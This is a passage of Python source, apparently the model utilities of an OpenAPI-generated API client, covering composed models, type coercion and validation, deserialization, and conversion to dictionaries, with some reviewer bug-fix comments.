        """Return the value of an attribute or raise ApiAttributeError."""
        if name in self:
            return self.get(name)
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )

    def __contains__(self, name):
        """True when the attribute exists on this instance."""
        if name in self.required_properties:
            return name in self.__dict__
        return name in self.__dict__['_data_store']

    def to_dict(self):
        """Returns the model properties as a dict (python attribute names)."""
        return model_to_dict(self, serialize=False)

    def to_str(self):
        """Returns the string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __eq__(self, other):
        """Models are equal when they store the same keys and equal values."""
        if not isinstance(other, self.__class__):
            return False
        if not set(self._data_store.keys()) == set(other._data_store.keys()):
            return False
        for _var_name, this_val in self._data_store.items():
            that_val = other._data_store[_var_name]
            types = set()
            types.add(this_val.__class__)
            types.add(that_val.__class__)
            vals_equal = this_val == that_val
            if not vals_equal:
                return False
        return True
class ModelComposed(OpenApiModel):
    """Base class for composed models (allOf/oneOf/anyOf schemas).

    A composed model holds one child instance per matched sub-schema.
    Property reads and writes are delegated to whichever child instances
    declare the property, tracked in ``_var_name_to_model_instances``.
    """

    def __setitem__(self, name, value):
        """Dict-style write: set ``name`` on every child instance that owns it."""
        if name in self.required_properties:
            self.__dict__[name] = value
            return
        # set the attribute on the correct instance
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        if model_instances:
            for model_instance in model_instances:
                if model_instance == self:
                    self.set_attribute(name, value)
                else:
                    setattr(model_instance, name, value)
                if name not in self._var_name_to_model_instances:
                    # we assigned an additional property
                    # NOTE(review): this stores a single instance, while get()
                    # below iterates the stored value as a collection —
                    # confirm against upstream openapi-generator behavior.
                    self.__dict__['_var_name_to_model_instances'][name] = (
                        model_instance
                    )
            return None
        raise ApiAttributeError(
            "{0} has no attribute '{1}'".format(
                type(self).__name__, name),
            [e for e in [self._path_to_item, name] if e]
        )

    # Sentinel so __getitem__ can distinguish a stored None from a missing
    # attribute.
    __unset_attribute_value__ = object()

    def get(self, name, default=None):
        """Return the value of ``name``, or ``default`` when unset.

        Raises ApiValueError if child instances disagree on the value.
        """
        if name in self.required_properties:
            return self.__dict__[name]
        # get the attribute from the correct instance
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        values = []
        # A composed model stores child (oneof/anyOf/allOf) models under
        # self._var_name_to_model_instances. A named property can exist in
        # multiple child models. If the property is present in more than one
        # child model, the value must be the same across all the child models.
        if model_instances:
            for model_instance in model_instances:
                if name in model_instance._data_store:
                    v = model_instance._data_store[name]
                    if v not in values:
                        values.append(v)
        len_values = len(values)
        if len_values == 0:
            return default
        elif len_values == 1:
            return values[0]
        elif len_values > 1:
            raise ApiValueError(
                "Values stored for property {0} in {1} differ when looking "
                "at self and self's composed instances. All values must be "
                "the same".format(name, type(self).__name__),
                [e for e in [self._path_to_item, name] if e]
            )

    def __getitem__(self, name):
        """Dict-style read access; unknown names raise ApiAttributeError."""
        value = self.get(name, self.__unset_attribute_value__)
        if value is self.__unset_attribute_value__:
            raise ApiAttributeError(
                "{0} has no attribute '{1}'".format(
                    type(self).__name__, name),
                [e for e in [self._path_to_item, name] if e]
            )
        return value

    def __contains__(self, name):
        """True when any child instance stores a value for ``name``."""
        if name in self.required_properties:
            return name in self.__dict__
        model_instances = self._var_name_to_model_instances.get(
            name, self._additional_properties_model_instances)
        if model_instances:
            for model_instance in model_instances:
                if name in model_instance._data_store:
                    return True
        return False

    def to_dict(self):
        """Return the model's stored properties as a plain dict."""
        return model_to_dict(self, serialize=False)

    def to_str(self):
        """Return a pretty-printed string of the model's properties."""
        return pprint.pformat(self.to_dict())

    def __eq__(self, other):
        """Models are equal when classes match and all stored values match."""
        if not isinstance(other, self.__class__):
            return False
        if not set(self._data_store.keys()) == set(other._data_store.keys()):
            return False
        for _var_name, this_val in self._data_store.items():
            that_val = other._data_store[_var_name]
            # 'types' is collected but never read (generated code).
            types = set()
            types.add(this_val.__class__)
            types.add(that_val.__class__)
            vals_equal = this_val == that_val
            if not vals_equal:
                return False
        return True
# Lower index = preferred coercion target when several types could match.
COERCION_INDEX_BY_TYPE = {
    ModelComposed: 0,
    ModelNormal: 1,
    ModelSimple: 2,
    none_type: 3,    # the type of None
    list: 4,
    dict: 5,
    float: 6,
    int: 7,
    bool: 8,
    datetime: 9,
    date: 10,
    str: 11,
    file_type: 12,
}

# (current type, new type) pairs that may be "upconverted" even when
# conversion is optional (must_convert=False) — see remove_uncoercible().
# NOTE: the generated original listed (list, ModelComposed) twice; the
# duplicate entry has been removed (membership semantics are unchanged).
UPCONVERSION_TYPE_PAIRS = (
    (str, datetime),
    (str, date),
    (int, float),
    (list, ModelComposed),
    (dict, ModelComposed),
    (str, ModelComposed),
    (int, ModelComposed),
    (float, ModelComposed),
    (list, ModelNormal),
    (dict, ModelNormal),
    (str, ModelSimple),
    (int, ModelSimple),
    (float, ModelSimple),
    (list, ModelSimple),
)

# (current type, new type) pairs that may be coerced when conversion is
# required, keyed by the spec_property_naming flag (see remove_uncoercible).
COERCIBLE_TYPE_PAIRS = {
    False: (
        # no pairs are coercible in this mode; the empty tuple is kept so
        # lookups by spec_property_naming always succeed
    ),
    True: (
        (dict, ModelComposed),
        (list, ModelComposed),
        (dict, ModelNormal),
        (list, ModelNormal),
        (str, ModelSimple),
        (int, ModelSimple),
        (float, ModelSimple),
        (list, ModelSimple),
        (str, datetime),
        (str, date),
        (str, file_type)
    ),
}
def get_simple_class(input_value):
    """Return the canonical class used to categorize *input_value*.

    Classes are returned unchanged; instances are mapped to one of the
    supported simple classes.  The isinstance checks are ordered so that a
    subclass matches before its base class.
    """
    if isinstance(input_value, type):
        # Already a class: categorize it as itself.
        return input_value
    if isinstance(input_value, tuple):
        return tuple
    if isinstance(input_value, list):
        return list
    if isinstance(input_value, dict):
        return dict
    if isinstance(input_value, none_type):
        return none_type
    if isinstance(input_value, file_type):
        return file_type
    # bool must be tested before int because bool subclasses int.
    if isinstance(input_value, bool):
        return bool
    if isinstance(input_value, int):
        return int
    # datetime must be tested before date because datetime subclasses date.
    if isinstance(input_value, datetime):
        return datetime
    if isinstance(input_value, date):
        return date
    if isinstance(input_value, str):
        return str
    return type(input_value)
def check_allowed_values(allowed_values, input_variable_path, input_values):
    """Raise ApiValueError if input_values are not all allowed.

    Args:
        allowed_values (dict): maps a variable path tuple to a dict whose
            values are the allowed values.
        input_variable_path (tuple): path to the input variable; its first
            element is used in error messages.
        input_values: a list (every element must be allowed), a dict (every
            key must be allowed), or a scalar (the value must be allowed).
    """
    these_allowed_values = list(allowed_values[input_variable_path].values())
    if (isinstance(input_values, list)
            and not set(input_values).issubset(
                set(these_allowed_values))):
        # BUG FIX: the original assignment ended with a stray trailing comma,
        # which made invalid_values a 1-tuple and garbled the error message.
        invalid_values = ", ".join(
            map(str, set(input_values) - set(these_allowed_values)))
        raise ApiValueError(
            "Invalid values for `%s` [%s], must be a subset of [%s]" %
            (
                input_variable_path[0],
                invalid_values,
                ", ".join(map(str, these_allowed_values))
            )
        )
    elif (isinstance(input_values, dict)
            and not set(
                input_values.keys()).issubset(set(these_allowed_values))):
        invalid_values = ", ".join(
            map(str, set(input_values.keys()) - set(these_allowed_values)))
        raise ApiValueError(
            "Invalid keys in `%s` [%s], must be a subset of [%s]" %
            (
                input_variable_path[0],
                invalid_values,
                ", ".join(map(str, these_allowed_values))
            )
        )
    elif (not isinstance(input_values, (list, dict))
            and input_values not in these_allowed_values):
        raise ApiValueError(
            "Invalid value for `%s` (%s), must be one of %s" %
            (
                input_variable_path[0],
                input_values,
                these_allowed_values
            )
        )
def is_json_validation_enabled(schema_keyword, configuration=None):
    """Return True if the JSON-schema keyword should be validated client-side.

    Validation is on by default; it is off only when the configuration
    explicitly lists the keyword in _disabled_client_side_validations.
    """
    if configuration is None:
        return True
    if not hasattr(configuration, '_disabled_client_side_validations'):
        return True
    return schema_keyword not in configuration._disabled_client_side_validations
def check_validations(
        validations, input_variable_path, input_values,
        configuration=None):
    """Raise ApiValueError if input_values fail the declared validations.

    Args:
        validations (dict): maps a variable path tuple to its validation
            rules (multiple_of, max_length, regex, ...).
        input_variable_path (tuple): path to the input variable; its first
            element is used in error messages.
        input_values: the value(s) to validate; None is always accepted.
        configuration: used to look up which client-side validations have
            been disabled (see is_json_validation_enabled).
    """
    # None is never validated against the keyword rules.
    if input_values is None:
        return

    current_validations = validations[input_variable_path]
    if (is_json_validation_enabled('multipleOf', configuration) and
            'multiple_of' in current_validations and
            isinstance(input_values, (int, float)) and
            not (float(input_values) / current_validations['multiple_of']).is_integer()):
        raise ApiValueError(
            "Invalid value for `%s`, value must be a multiple of "
            "`%s`" % (
                input_variable_path[0],
                current_validations['multiple_of']
            )
        )

    if (is_json_validation_enabled('maxLength', configuration) and
            'max_length' in current_validations and
            len(input_values) > current_validations['max_length']):
        raise ApiValueError(
            "Invalid value for `%s`, length must be less than or equal to "
            "`%s`" % (
                input_variable_path[0],
                current_validations['max_length']
            )
        )

    if (is_json_validation_enabled('minLength', configuration) and
            'min_length' in current_validations and
            len(input_values) < current_validations['min_length']):
        raise ApiValueError(
            "Invalid value for `%s`, length must be greater than or equal to "
            "`%s`" % (
                input_variable_path[0],
                current_validations['min_length']
            )
        )

    if (is_json_validation_enabled('maxItems', configuration) and
            'max_items' in current_validations and
            len(input_values) > current_validations['max_items']):
        raise ApiValueError(
            "Invalid value for `%s`, number of items must be less than or "
            "equal to `%s`" % (
                input_variable_path[0],
                current_validations['max_items']
            )
        )

    if (is_json_validation_enabled('minItems', configuration) and
            'min_items' in current_validations and
            len(input_values) < current_validations['min_items']):
        # BUG FIX: this branch raised a bare ValueError, inconsistent with
        # every other branch; callers catch ApiValueError.
        raise ApiValueError(
            "Invalid value for `%s`, number of items must be greater than or "
            "equal to `%s`" % (
                input_variable_path[0],
                current_validations['min_items']
            )
        )

    items = ('exclusive_maximum', 'inclusive_maximum', 'exclusive_minimum',
             'inclusive_minimum')
    if (any(item in current_validations for item in items)):
        # For containers, validate the extreme values; for scalars, the
        # value itself is both the min and the max.
        if isinstance(input_values, list):
            max_val = max(input_values)
            min_val = min(input_values)
        elif isinstance(input_values, dict):
            max_val = max(input_values.values())
            min_val = min(input_values.values())
        else:
            max_val = input_values
            min_val = input_values

    if (is_json_validation_enabled('exclusiveMaximum', configuration) and
            'exclusive_maximum' in current_validations and
            max_val >= current_validations['exclusive_maximum']):
        raise ApiValueError(
            "Invalid value for `%s`, must be a value less than `%s`" % (
                input_variable_path[0],
                current_validations['exclusive_maximum']
            )
        )

    if (is_json_validation_enabled('maximum', configuration) and
            'inclusive_maximum' in current_validations and
            max_val > current_validations['inclusive_maximum']):
        raise ApiValueError(
            "Invalid value for `%s`, must be a value less than or equal to "
            "`%s`" % (
                input_variable_path[0],
                current_validations['inclusive_maximum']
            )
        )

    if (is_json_validation_enabled('exclusiveMinimum', configuration) and
            'exclusive_minimum' in current_validations and
            min_val <= current_validations['exclusive_minimum']):
        # BUG FIX: the message formatted current_validations['exclusive_maximum'],
        # which is wrong and raises KeyError when only exclusive_minimum is set.
        raise ApiValueError(
            "Invalid value for `%s`, must be a value greater than `%s`" %
            (
                input_variable_path[0],
                current_validations['exclusive_minimum']
            )
        )

    if (is_json_validation_enabled('minimum', configuration) and
            'inclusive_minimum' in current_validations and
            min_val < current_validations['inclusive_minimum']):
        raise ApiValueError(
            "Invalid value for `%s`, must be a value greater than or equal "
            "to `%s`" % (
                input_variable_path[0],
                current_validations['inclusive_minimum']
            )
        )
    flags = current_validations.get('regex', {}).get('flags', 0)
    if (is_json_validation_enabled('pattern', configuration) and
            'regex' in current_validations and
            not re.search(current_validations['regex']['pattern'],
                          input_values, flags=flags)):
        err_msg = r"Invalid value for `%s`, must match regular expression `%s`" % (
            input_variable_path[0],
            current_validations['regex']['pattern']
        )
        if flags != 0:
            # specified in the OAS document.
            err_msg = r"%s with flags=`%s`" % (err_msg, flags)
        raise ApiValueError(err_msg)
def order_response_types(required_types):
    """Return required_types sorted so preferred coercion targets come first.

    Args:
        required_types (list/tuple): classes, or list/dict instances, to rank.

    Returns:
        list: the input ordered by COERCION_INDEX_BY_TYPE rank.

    Raises:
        ApiValueError: when an entry cannot be ranked.
    """

    def index_getter(class_or_instance):
        """Rank a single entry for sorting."""
        if isinstance(class_or_instance, list):
            return COERCION_INDEX_BY_TYPE[list]
        elif isinstance(class_or_instance, dict):
            return COERCION_INDEX_BY_TYPE[dict]
        elif (inspect.isclass(class_or_instance)
                and issubclass(class_or_instance, ModelComposed)):
            return COERCION_INDEX_BY_TYPE[ModelComposed]
        elif (inspect.isclass(class_or_instance)
                and issubclass(class_or_instance, ModelNormal)):
            return COERCION_INDEX_BY_TYPE[ModelNormal]
        elif (inspect.isclass(class_or_instance)
                and issubclass(class_or_instance, ModelSimple)):
            return COERCION_INDEX_BY_TYPE[ModelSimple]
        elif class_or_instance in COERCION_INDEX_BY_TYPE:
            return COERCION_INDEX_BY_TYPE[class_or_instance]
        raise ApiValueError("Unsupported type: %s" % class_or_instance)

    # index_getter already is a one-argument key function; the generated
    # original wrapped it in a redundant lambda.
    sorted_types = sorted(required_types, key=index_getter)
    return sorted_types
def remove_uncoercible(required_types_classes, current_item, spec_property_naming,
                       must_convert=True):
    """Filter required_types_classes down to classes current_item can become.

    A candidate is kept when the (current type, candidate type) pair is in
    COERCIBLE_TYPE_PAIRS (for must_convert=True) or UPCONVERSION_TYPE_PAIRS.
    """
    current_type_simple = get_simple_class(current_item)

    coercible = []
    for candidate in required_types_classes:
        # Collapse concrete generated model classes onto their OpenApiModel
        # category so they can be matched against the pair tables.
        simplified = candidate
        if isinstance(simplified, type):
            if issubclass(simplified, ModelComposed):
                simplified = ModelComposed
            elif issubclass(simplified, ModelNormal):
                simplified = ModelNormal
            elif issubclass(simplified, ModelSimple):
                simplified = ModelSimple

        if simplified == current_type_simple:
            # Converting to one's own class is never needed.
            continue

        class_pair = (current_type_simple, simplified)
        if must_convert and class_pair in COERCIBLE_TYPE_PAIRS[spec_property_naming]:
            coercible.append(candidate)
        elif class_pair in UPCONVERSION_TYPE_PAIRS:
            coercible.append(candidate)
    return coercible
def get_discriminated_classes(cls):
    """Return every class that a discriminator on cls can map to, walking
    nested discriminators recursively."""
    discr_key = list(cls.discriminator.keys())[0]
    found = []
    if is_type_nullable(cls):
        found.append(cls)
    for candidate in cls.discriminator[discr_key].values():
        if hasattr(candidate, 'discriminator') and candidate.discriminator is not None:
            # The mapped class has a discriminator of its own; recurse.
            found.extend(get_discriminated_classes(candidate))
        else:
            found.append(candidate)
    return found
def get_possible_classes(cls, from_server_context):
    """Return the classes that data declared as cls may deserialize into."""
    # TODO: lru_cache this
    if from_server_context:
        # Server data is authoritative: only the declared class applies.
        return [cls]
    if hasattr(cls, 'discriminator') and cls.discriminator is not None:
        # The discriminator mapping replaces cls entirely.
        return list(get_discriminated_classes(cls))
    possible = [cls]
    if issubclass(cls, ModelComposed):
        possible.extend(composed_model_input_classes(cls))
    return possible
def get_required_type_classes(required_types_mixed, spec_property_naming):
    """Split required types into valid classes plus per-container item types.

    Returns:
        tuple of (valid_classes, child_req_types_by_current_type): the tuple
        of acceptable classes, and a map from container class to the
        required types of its items.
    """
    valid_classes = []
    child_req_types_by_current_type = {}
    for type_spec in required_types_mixed:
        if isinstance(type_spec, list):
            # A list spec: list itself plus its declared item types.
            valid_classes.append(list)
            child_req_types_by_current_type[list] = type_spec
        elif isinstance(type_spec, tuple):
            valid_classes.append(tuple)
            child_req_types_by_current_type[tuple] = type_spec
        elif isinstance(type_spec, dict):
            # A dict spec: value types live under the str key.
            valid_classes.append(dict)
            child_req_types_by_current_type[dict] = type_spec[str]
        else:
            valid_classes.extend(
                get_possible_classes(type_spec, spec_property_naming))
    return tuple(valid_classes), child_req_types_by_current_type
def change_keys_js_to_python(input_dict, model_class):
    """Convert javascript-named keys in input_dict to their python names.

    Unknown keys (bad input or additionalProperties variables) are kept
    unchanged.
    """
    attribute_map = getattr(model_class, 'attribute_map', None)
    if attribute_map is None:
        # No mapping on this class; return the dict unchanged.
        return input_dict
    js_to_python = {js_name: py_name
                    for py_name, js_name in attribute_map.items()}
    converted = {}
    for js_key, value in input_dict.items():
        py_key = js_to_python.get(js_key)
        if py_key is None:
            # Unknown key: keep the javascript name as-is.
            py_key = js_key
        converted[py_key] = value
    return converted
def get_type_error(var_value, path_to_item, valid_classes, key_type=False):
    """Build (not raise) an ApiTypeError describing an invalid value or key."""
    message = type_error_message(
        var_name=path_to_item[-1],
        var_value=var_value,
        valid_classes=valid_classes,
        key_type=key_type
    )
    return ApiTypeError(
        message,
        path_to_item=path_to_item,
        valid_classes=valid_classes,
        key_type=key_type
    )
def deserialize_primitive(data, klass, path_to_item):
    """Deserialize data into an instance of a primitive class.

    Args:
        data (str/int/float): the raw value to convert.
        klass (type): one of str, int, float, bool, date, datetime.
        path_to_item (list): path to the data, used in error reporting.

    Returns:
        An instance of klass.

    Raises:
        ApiValueError: chained from the underlying ValueError/OverflowError
            when the data cannot be parsed as klass.
    """
    fallback_hint = ""
    try:
        if klass not in {datetime, date}:
            converted = klass(data)
            if klass == float and isinstance(data, str) and str(converted) != data:
                # '7' -> 7.0 -> '7.0' != '7': the input was not really a float.
                raise ValueError('This is not a float')
            return converted

        # The literal `{}` below is intentional: it shows the spec author how
        # to declare an any-typed parameter.
        fallback_hint = (
            "If you need your parameter to have a fallback "
            "string value, please set its type as `type: {}` in your "
            "spec. That allows the value to be any type. "
        )
        if klass == date:
            if len(data) < 8:
                raise ValueError("This is not a date")
            return parse(data).date()

        # klass == datetime: the string should be iso8601 datetime format.
        if len(data) < 8:
            raise ValueError("This is not a datetime")
        parsed_datetime = parse(data)
        looks_like_plain_date = (
            parsed_datetime.hour == 0 and
            parsed_datetime.minute == 0 and
            parsed_datetime.second == 0 and
            parsed_datetime.tzinfo is None and
            8 <= len(data) <= 10
        )
        if looks_like_plain_date:
            raise ValueError("This is a date, not a datetime")
        return parsed_datetime
    except (OverflowError, ValueError) as ex:
        # parse() can raise OverflowError for out-of-range dates.
        raise ApiValueError(
            "{0}Failed to parse {1} as {2}".format(
                fallback_hint, repr(data), klass.__name__
            ),
            path_to_item=path_to_item
        ) from ex
def get_discriminator_class(model_class,
                            discr_name,
                            discr_value, cls_visited):
    """Return the child class selected by the discriminator value, searching
    model_class and its composed schemas recursively.

    Args:
        model_class: the class whose discriminator mapping is searched.
        discr_name: the python name of the discriminator property.
        discr_value: the payload's value for the discriminator property.
        cls_visited (list): classes already visited; mutated in place to
            guard against cycles in the schema graph.

    Returns:
        The matching class, or None when no suitable class is found.
    """
    if model_class in cls_visited:
        # The class has already been visited and no suitable class was found.
        return None
    cls_visited.append(model_class)
    used_model_class = None
    if discr_name in model_class.discriminator:
        class_name_to_discr_class = model_class.discriminator[discr_name]
        used_model_class = class_name_to_discr_class.get(discr_value)
    if used_model_class is None:
        # We didn't find a discriminated class in class_name_to_discr_class.
        # Search descendants (oneOf/anyOf) before ancestors (allOf).
        descendant_classes = model_class._composed_schemas.get('oneOf', ()) + \
            model_class._composed_schemas.get('anyOf', ())
        ancestor_classes = model_class._composed_schemas.get('allOf', ())
        possible_classes = descendant_classes + ancestor_classes
        for cls in possible_classes:
            if hasattr(cls, 'discriminator') and cls.discriminator is not None:
                used_model_class = get_discriminator_class(
                    cls, discr_name, discr_value, cls_visited)
                if used_model_class is not None:
                    return used_model_class
    return used_model_class
def deserialize_model(model_data, model_class, path_to_item, check_type,
                      configuration, spec_property_naming):
    """Deserialize model_data into a model_class instance.

    Note: falls through and returns None implicitly when model_data matches
    none of the handled shapes (ModelSimple target, list, dict, primitive).
    """
    kw_args = dict(_check_type=check_type,
                   _path_to_item=path_to_item,
                   _configuration=configuration,
                   _spec_property_naming=spec_property_naming)
    if issubclass(model_class, ModelSimple):
        # ModelSimple wraps a single value; pass the data positionally.
        return model_class(model_data, **kw_args)
    elif isinstance(model_data, list):
        # A list is splatted into positional constructor arguments.
        return model_class(*model_data, **kw_args)
    if isinstance(model_data, dict):
        # A dict becomes keyword arguments alongside the bookkeeping kwargs.
        kw_args.update(model_data)
        return model_class(**kw_args)
    elif isinstance(model_data, PRIMITIVE_TYPES):
        return model_class(model_data, **kw_args)
def deserialize_file(response_data, configuration, content_disposition=None):
    """Write response_data to a fresh temp file and return it opened 'rb'.

    The caller owns the returned file handle and the file on disk.
    """
    # Reserve a unique path in the configured temp folder, then release the
    # descriptor: the file is rewritten below (possibly under a new name).
    handle, path = tempfile.mkstemp(dir=configuration.temp_folder_path)
    os.close(handle)
    os.remove(path)

    if content_disposition:
        # Honor the server-suggested filename, keeping the temp directory.
        filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?',
                             content_disposition).group(1)
        path = os.path.join(os.path.dirname(path), filename)

    with open(path, "wb") as out:
        payload = response_data
        if isinstance(payload, str):
            # change str to bytes so we can write it
            payload = payload.encode('utf-8')
        out.write(payload)

    return open(path, "rb")
def attempt_convert_item(input_value, valid_classes, path_to_item,
                         configuration, spec_property_naming, key_type=False,
                         must_convert=False, check_type=True):
    """Try to convert input_value into one of valid_classes, best class first.

    Returns the first successful conversion; when nothing is coercible and
    configuration.discard_unknown_keys is set, the loop below is skipped and
    the input is returned unchanged instead of raising.
    """
    valid_classes_ordered = order_response_types(valid_classes)
    valid_classes_coercible = remove_uncoercible(
        valid_classes_ordered, input_value, spec_property_naming)
    if not valid_classes_coercible or key_type:
        # we do not handle keytype errors, json will take care
        # of this for us
        if configuration is None or not configuration.discard_unknown_keys:
            raise get_type_error(input_value, path_to_item, valid_classes,
                                 key_type=key_type)
    for valid_class in valid_classes_coercible:
        try:
            if issubclass(valid_class, OpenApiModel):
                return deserialize_model(input_value, valid_class,
                                         path_to_item, check_type,
                                         configuration, spec_property_naming)
            elif valid_class == file_type:
                return deserialize_file(input_value, configuration)
            return deserialize_primitive(input_value, valid_class,
                                         path_to_item)
        except (ApiTypeError, ApiValueError, ApiKeyError) as conversion_exc:
            if must_convert:
                raise conversion_exc
            # if we have conversion errors when must_convert == False
            # we ignore the exception and move on to the next class
            continue
    # we were unable to convert, must_convert == False
    return input_value
def is_type_nullable(input_type):
    """Return True when None is an acceptable value for input_type."""
    if input_type is none_type:
        return True
    if issubclass(input_type, OpenApiModel) and input_type._nullable:
        return True
    if issubclass(input_type, ModelComposed):
        # If oneOf/anyOf, check if the 'null' type is one of the allowed types.
        schemas = input_type._composed_schemas
        children = tuple(schemas.get('oneOf', ())) + tuple(schemas.get('anyOf', ()))
        return any(is_type_nullable(child) for child in children)
    return False
def is_valid_type(input_class_simple, valid_classes):
    """Return True when input_class_simple is acceptable for valid_classes."""
    if input_class_simple in valid_classes:
        return True
    # Not a direct match: only models and the null type can still be accepted
    # through a discriminator or a nullable composed schema.
    if (input_class_simple is not none_type
            and not issubclass(input_class_simple, OpenApiModel)):
        return False
    for valid_class in valid_classes:
        if input_class_simple is none_type and is_type_nullable(valid_class):
            # Schema is oneOf/anyOf and the 'null' type is one of the allowed types.
            return True
        if not (issubclass(valid_class, OpenApiModel) and valid_class.discriminator):
            continue
        discr_propertyname_py = list(valid_class.discriminator.keys())[0]
        discriminator_classes = (
            valid_class.discriminator[discr_propertyname_py].values()
        )
        if is_valid_type(input_class_simple, discriminator_classes):
            return True
    return False
def validate_and_convert_types(input_value, required_types_mixed, path_to_item,
                               spec_property_naming, _check_type, configuration=None):
    """Validate input_value against the required types, converting when needed.

    Recurses into lists and dicts; note that container contents are
    converted IN PLACE (the same list/dict object is returned mutated).
    """
    results = get_required_type_classes(required_types_mixed, spec_property_naming)
    valid_classes, child_req_types_by_current_type = results
    input_class_simple = get_simple_class(input_value)
    valid_type = is_valid_type(input_class_simple, valid_classes)
    if not valid_type:
        if configuration:
            # if input_value is not valid_type try to convert it
            converted_instance = attempt_convert_item(
                input_value,
                valid_classes,
                path_to_item,
                configuration,
                spec_property_naming,
                key_type=False,
                must_convert=True,
                check_type=_check_type
            )
            return converted_instance
        else:
            raise get_type_error(input_value, path_to_item, valid_classes,
                                 key_type=False)
    # input_value's type is in valid_classes
    if len(valid_classes) > 1 and configuration:
        # there are valid classes which are not the current class
        valid_classes_coercible = remove_uncoercible(
            valid_classes, input_value, spec_property_naming, must_convert=False)
        if valid_classes_coercible:
            converted_instance = attempt_convert_item(
                input_value,
                valid_classes_coercible,
                path_to_item,
                configuration,
                spec_property_naming,
                key_type=False,
                must_convert=False,
                check_type=_check_type
            )
            return converted_instance
    if child_req_types_by_current_type == {}:
        # all types are of the required types and there are no more inner
        # variables left to look at
        return input_value
    inner_required_types = child_req_types_by_current_type.get(
        type(input_value)
    )
    if inner_required_types is None:
        # for this type, there are not more inner variables left to look at
        return input_value
    if isinstance(input_value, list):
        if input_value == []:
            # allow an empty list
            return input_value
        for index, inner_value in enumerate(input_value):
            inner_path = list(path_to_item)
            inner_path.append(index)
            input_value[index] = validate_and_convert_types(
                inner_value,
                inner_required_types,
                inner_path,
                spec_property_naming,
                _check_type,
                configuration=configuration
            )
    elif isinstance(input_value, dict):
        if input_value == {}:
            # allow an empty dict
            return input_value
        for inner_key, inner_val in input_value.items():
            inner_path = list(path_to_item)
            inner_path.append(inner_key)
            # Dict keys must be strings; anything else is a key-type error.
            if get_simple_class(inner_key) != str:
                raise get_type_error(inner_key, inner_path, valid_classes,
                                     key_type=True)
            input_value[inner_key] = validate_and_convert_types(
                inner_val,
                inner_required_types,
                inner_path,
                spec_property_naming,
                _check_type,
                configuration=configuration
            )
    return input_value
def model_to_dict(model_instance, serialize=True):
    """Return the model's stored properties as a plain dict.

    Args:
        model_instance: the model (possibly composed) to convert.
        serialize (bool): when True, keys are renamed to their
            javascript/spec names via attribute_map.
    """
    result = {}

    instances = [model_instance]
    if model_instance._composed_schemas:
        # Composed models also carry values on their child instances.
        instances.extend(model_instance._composed_instances)
    for instance in instances:
        for attr, value in instance._data_store.items():
            if serialize:
                # get() because additional-property names are absent from
                # attribute_map.
                attr = instance.attribute_map.get(attr, attr)
            if isinstance(value, list):
                if not value:
                    # nothing to convert in an empty list
                    result[attr] = value
                    continue
                converted = []
                for element in value:
                    if isinstance(element, PRIMITIVE_TYPES) or element is None:
                        converted.append(element)
                    elif isinstance(element, ModelSimple):
                        converted.append(element.value)
                    else:
                        converted.append(
                            model_to_dict(element, serialize=serialize))
                result[attr] = converted
            elif isinstance(value, dict):
                result[attr] = {
                    key: (model_to_dict(val, serialize=serialize)
                          if hasattr(val, '_data_store') else val)
                    for key, val in value.items()
                }
            elif isinstance(value, ModelSimple):
                result[attr] = value.value
            elif hasattr(value, '_data_store'):
                result[attr] = model_to_dict(value, serialize=serialize)
            else:
                result[attr] = value
    return result
def type_error_message(var_value=None, var_name=None, valid_classes=None,
                       key_type=None):
    """Build the message text for an ApiTypeError.

    Args:
        var_value: the offending value.
        var_name: the name of the variable being reported.
        valid_classes (tuple): the acceptable classes.
        key_type (bool): True when the error concerns a dict key rather
            than a value.
    """
    kind = 'key' if key_type else 'value'
    allowed = get_valid_classes_phrase(valid_classes)
    return (
        "Invalid type for variable '{0}'. Required {1} type {2} and "
        "passed type was {3}".format(
            var_name,
            kind,
            allowed,
            type(var_value).__name__,
        )
    )
def get_valid_classes_phrase(input_classes):
    """Return an English phrase naming the acceptable classes, sorted by name."""
    names = sorted(cls.__name__ for cls in input_classes)
    if len(names) == 1:
        return 'is {0}'.format(names[0])
    return "is one of [{0}]".format(", ".join(names))
def convert_js_args_to_python_args(fn):
    """Decorator that remaps javascript-named kwargs onto python names.

    The remapping only happens when the call carries
    _spec_property_naming=True (i.e. data straight from the server).
    """
    from functools import wraps

    @wraps(fn)
    def wrapped_init(_self, *args, **kwargs):
        if kwargs.get('_spec_property_naming', False):
            kwargs = change_keys_js_to_python(kwargs, _self.__class__)
        return fn(_self, *args, **kwargs)

    return wrapped_init
def get_allof_instances(self, model_args, constant_args):
    """Instantiate every allOf schema of self from the given arguments.

    Args:
        self: the composed model being built.
        model_args (dict): property values.  These are already keyed by
            python names because, for composed schemas, allOf parameters
            were converted in __new__.
        constant_args (dict): the _check_type/_path_to_item/... kwargs.

    Returns:
        list: one instance per allOf class.

    Raises:
        ApiValueError: when an allOf class rejects its inputs.
    """
    instances = []
    for allof_class in self._composed_schemas['allOf']:
        # Pick out only the arguments this allOf class declares, then add
        # the shared bookkeeping kwargs.
        declared = set(allof_class.openapi_types.keys())
        kwargs = {name: model_args[name]
                  for name in declared if name in model_args}
        kwargs.update(constant_args)
        try:
            instances.append(allof_class(**kwargs))
        except Exception as ex:
            raise ApiValueError(
                "Invalid inputs given to generate an instance of '%s'. The "
                "input data was invalid for the allOf schema '%s' in the composed "
                "schema '%s'. Error=%s" % (
                    allof_class.__name__,
                    allof_class.__name__,
                    self.__class__.__name__,
                    str(ex)
                )
            ) from ex
    return instances
def get_oneof_instance(cls, model_kwargs, constant_kwargs, model_arg=None):
    """Instantiate the single oneOf schema of cls that matches the input.

    Args:
        cls: the composed model class.
        model_kwargs (dict): property values, keyed by javascript names.
        constant_kwargs (dict): the _check_type/_path_to_item/... kwargs.
        model_arg: the positional value for single-value-input schemas.

    Returns:
        The one matching oneOf instance, or None when cls declares no oneOf
        schemas.

    Raises:
        ApiValueError: when zero or more than one oneOf schema matches.
    """
    if len(cls._composed_schemas['oneOf']) == 0:
        return None
    oneof_instances = []
    # Iterate over each oneOf schema and determine if the input data
    # matches the oneOf schemas.
    for oneof_class in cls._composed_schemas['oneOf']:
        # The composed oneOf schema allows the 'null' type and the input data
        # is the null value. This is a OAS >= 3.1 feature.
        if oneof_class is none_type:
            # skip none_types because we are deserializing dict data.
            # none_type deserialization is handled in the __new__ method
            continue
